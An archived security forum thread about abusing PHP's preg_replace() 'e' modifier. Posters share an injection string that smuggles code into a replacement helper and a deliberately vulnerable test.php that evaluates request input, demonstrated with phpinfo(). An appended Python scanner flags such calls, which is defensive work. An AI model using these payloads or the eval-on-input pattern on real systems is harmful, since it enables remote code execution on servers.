Sla.ckers.org
Abuse of preg_replace() with the "e" modifier
Posted by: hookits
Date: September 28, 2009 03:23AM

Hey, guys

I found an interesting function on php.net
http://www.php.net/manual/en/function.preg-replace.php#36810

Here is the function:

<?php
/**
 * Written by Rowan Lewis of PixelCarnage.com
 * $search(string), the string to be searched for
 * $replace(string), the string to replace $search
 * $subject(string), the string to be searched in
 *
 * Note: the "e" modifier makes preg_replace() eval() the replacement string
 * once per match, and $search / $replace are concatenated into that string.
 */
function word_replace($search, $replace, $subject) {
    return preg_replace('/[a-zA-Z]+/e', '\'\0\' == \'' . $search . '\' ? \'' . $replace . '\': \'\0\';', $subject);
}
?>

This particular function allows us to execute PHP code for every sub-pattern matched by the regular expression; it is just something like the eval() operation.

I am looking for a PoC to exploit it.

Re: Abuse of preg_replace() with the "e" modifier
Posted by: Anonymous User
Date: September 28, 2009 08:23AM

echo word_replace('a\';die(1);//', '', 'a');

Re: Abuse of preg_replace() with the "e" modifier
Posted by: rvdh
Date: September 28, 2009 08:58AM

http://www.google.com/search?q=preg_replace%28%29+with+the+%22e%22+modifer

Re: Abuse of preg_replace() with the "e" modifier
Posted by: hookits
Date: September 28, 2009 08:50PM

Thanks .mario & rvdh :)

I found a very simple PoC, like this:

/* test.php */
<?php
$h = $_GET['h'];
// With the "e" modifier the replacement ($h, taken straight from the request)
// is evaluated as PHP code for every match of "test".
echo preg_replace("/test/e", $h, "just test");
?>

It works like this: hxxp://site.com/test.php?h=phpinfo()

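A static check for the pattern discussed in this thread, added here as an example and not something any poster wrote: it scans PHP source for preg_replace() calls whose pattern literal carries the "e" modifier and reports whether the replacement argument is a fixed string or is built from variables, as in word_replace() in the first post and test.php above, which is the case where request data reaches the implicit eval(). The PHP source it scans is constructed for the demo.

```python
import re

# Constructed PHP source to audit: the two snippets from this thread, a call without e, and an e call with a literal replacement.
SAMPLE_PHP = r'''
function word_replace($search, $replace, $subject) {
    return preg_replace('/[a-zA-Z]+/e', '\'\0\' == \'' . $search . '\' ? \'' . $replace . '\': \'\0\';', $subject);
}
$h = $_GET['h'];
echo preg_replace("/test/e", $h, "just test");
echo preg_replace("/test/i", $h, "just test");
echo preg_replace('/(\w+)/e', "strtoupper('\\1')", $subject);
'''
# A PHP string literal that cannot interpolate variables ('...' or "..." without $).
LITERAL = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\$]|\\.)*\"")

def _read_arg(src, i):
    # One call argument from index i, honouring quotes, escapes and nested parentheses; stops at a top-level ',' or ')'.
    start, depth, quote = i, 0, None
    while i < len(src):
        c = src[i]
        if quote:
            if c == '\\':
                i += 1          # skip the escaped character
            elif c == quote:
                quote = None
        elif c in '\'"':
            quote = c
        elif c == '(':
            depth += 1
        elif c == ')' and depth:
            depth -= 1
        elif c == ')' or (c == ',' and not depth):
            break
        i += 1
    return src[start:i].strip(), i

def find_e_modifier(src):
    # (line, modifiers, replacement, dynamic) per preg_replace() whose pattern literal carries e; dynamic means non-literal data can reach the eval().
    found = []
    for m in re.finditer(r'\bpreg_replace\s*\(', src):
        pattern, i = _read_arg(src, m.end())
        if len(pattern) < 3 or pattern[0] not in '\'"' or pattern[-1] != pattern[0]:
            continue  # pattern is not a string literal; cannot judge statically
        body = pattern[1:-1]
        closing = {'(': ')', '[': ']', '{': '}', '<': '>'}.get(body[0], body[0])
        mods = body[body.rfind(closing) + 1:]
        if 'e' in mods and src[i] == ',':
            repl, _ = _read_arg(src, i + 1)
            found.append((src.count('\n', 0, m.start()) + 1, mods, repl, not LITERAL.fullmatch(repl)))
    return found
```

Running find_e_modifier(SAMPLE_PHP) flags lines 3, 6 and 8 of the sample; only line 8 has a fixed literal replacement, the other two are dynamic.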